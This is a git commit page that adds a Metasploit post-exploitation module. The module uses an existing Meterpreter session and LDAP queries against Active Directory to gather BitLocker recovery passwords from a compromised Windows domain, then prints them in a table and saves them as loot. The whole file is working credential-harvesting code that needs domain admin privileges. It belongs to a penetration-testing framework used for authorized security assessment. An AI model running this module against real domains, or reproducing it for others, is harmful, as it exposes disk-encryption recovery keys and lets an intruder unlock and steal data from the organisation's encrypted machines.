Land #5268, @Meatballs1's post windows module to retrieve Bitlocker Recovery Keys from AD

2015-06-26 17:07:36 -05:00 · 2015-06-26 17:07:36 -05:00 · 093f339f6b
parent 326bec0a1f 600a296291
commit 093f339f6b
1 changed files with 75 additions and 0 deletions
--- a/modules/post/windows/gather/enum_ad_bitlocker.rb
+++ b/modules/post/windows/gather/enum_ad_bitlocker.rb
@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::LDAP
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Windows Gather Active Directory BitLocker Recovery',
+      'Description'  => %q{
+        This module will enumerate BitLocker recovery passwords in the default AD
+        directory. Requires Domain Admin or other delegated privileges.
+      },
+      'License'      => MSF_LICENSE,
+      'Author'       => ['Ben Campbell <ben.campbell[at]mwrinfosecurity.com>'],
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter'],
+      'References'   =>
+        [
+          ['URL', 'https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx']
+        ]
+    ))
+
+    register_options([
+      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
+      OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']),
+      OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)'])
+    ], self.class)
+  end
+
+  def run
+    fields = datastore['FIELDS'].gsub(/\s+/, "").split(',')
+    search_filter = datastore['FILTER']
+    max_search = datastore['MAX_SEARCH']
+    q = query(search_filter, max_search, fields)
+
+    if q.nil? || q[:results].empty?
+      print_status('No results found...')
+      return
+    end
+
+    # Results table holds raw string data
+    results_table = Rex::Ui::Text::Table.new(
+      'Header'     => 'BitLocker Recovery Passwords',
+      'Indent'     => 1,
+      'SortIndex'  => -1,
+      'Columns'    => fields
+    )
+
+    q[:results].each do |result|
+      row = []
+
+      result.each do |field|
+        field_value = (field.nil? ? '' : field[:value])
+        row << field_value
+      end
+
+      results_table << row
+    end
+
+    print_line results_table.to_s
+
+    if datastore['STORE_LOOT']
+      stored_path = store_loot('bitlocker.recovery', 'text/plain', session, results_table.to_csv)
+      print_status("Results saved to: #{stored_path}")
+    end
+  end
+end